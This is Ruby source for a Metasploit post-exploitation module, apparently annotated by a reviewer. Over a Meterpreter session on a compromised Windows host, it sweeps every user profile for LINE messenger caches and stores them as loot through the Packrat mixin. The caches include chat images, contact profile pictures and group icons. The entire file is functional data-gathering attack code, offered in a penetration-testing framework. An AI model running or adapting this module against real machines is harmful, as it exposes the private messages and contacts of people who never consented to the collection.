##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that sweeps every Windows user profile on the session host for
# LINE desktop image caches and hands them to the Packrat mixin, which applies
# the REGEX / STORE_LOOT / EXTRACT_DATA options to whatever it finds.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Builds one gatherable-artifact entry for ARTIFACTS.
  #
  # Every LINE artifact this module knows about is an image under the user's
  # LocalAppData tree, so only the sub-directory, the file glob and the
  # human-readable description differ between entries.
  #
  # @param dir [String] sub-directory below LocalAppData (backslash separated)
  # @param pattern [String] file glob matched inside +dir+
  # @param description [String] text shown for this artifact type
  # @return [Hash] entry in the shape consumed by run_packrat
  def self.image_artifact(dir, pattern, description)
    {
      filetypes: 'images',
      path: 'LocalAppData',
      dir: dir,
      artifact_file_name: pattern,
      description: description,
      # NOTE(review): these are image caches but are classified as 'chat_log';
      # confirm this is the intended loot type for Packrat.
      credential_type: 'chat_log'
    }
  end
  private_class_method :image_artifact

  # Artifact catalogue passed to run_packrat. Only the outer hash is frozen;
  # the per-artifact hashes remain mutable, as in the original definition.
  ARTIFACTS = {
    application: 'line',
    app_category: 'chats',
    gatherable_artifacts: [
      image_artifact('LINE', '*.png', 'Image cache with png extension'),
      image_artifact('LINE', '*.jpeg', 'Image cache for jpg cache'),
      image_artifact('LINE\\Cache\\p', '*', 'Image cache for profile images of users'),
      image_artifact('LINE\\Cache\\g', '*', 'Image cache for group icons'),
      image_artifact('LINE\\Cache\\m', '*', 'Image cache for images sent through chat'),
      image_artifact('LINE\\Cache\\e', '*', 'Image cache for profile images sent by official accounts'),
      image_artifact('LINE\\Data\\pizza', '*', 'Image cache for profile images of users')
    ]
  }.freeze

  # Registers module metadata and the Packrat-style options.
  #
  # @param info [Hash] module info supplied by the framework loader
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LINE Credential Gatherer',
        'Description' => %q{
          This module searches for credentials in LINE desktop application on a Windows host. 
          LINE is the most popular Instant Messenger app in Japan.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => %w[win],
        'SessionTypes' => %w[meterpreter],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The ARTIFACTS enum is derived from the catalogue above, so adding an
    # artifact type there makes it selectable here without further edits.
    artifact_types = ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }.uniq
    register_options(
      [
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ['All'] + artifact_types])
      ]
    )
  end

  # Prints the active option selection, then runs one Packrat sweep per user
  # profile returned by grab_user_profiles.
  def run
    print_status('Filtering based on these selections: ')

    selections = {
      'ARTIFACTS' => datastore['ARTIFACTS'].capitalize,
      'STORE_LOOT' => datastore['STORE_LOOT'],
      'EXTRACT_DATA' => "#{datastore['EXTRACT_DATA']}\n"
    }
    selections.each { |name, value| print_status("#{name}: #{value}") }

    # one sweep per user profile found on the remote host
    grab_user_profiles.each { |profile| run_packrat(profile, ARTIFACTS) }

    print_status 'PackRat credential sweep completed'
  end
end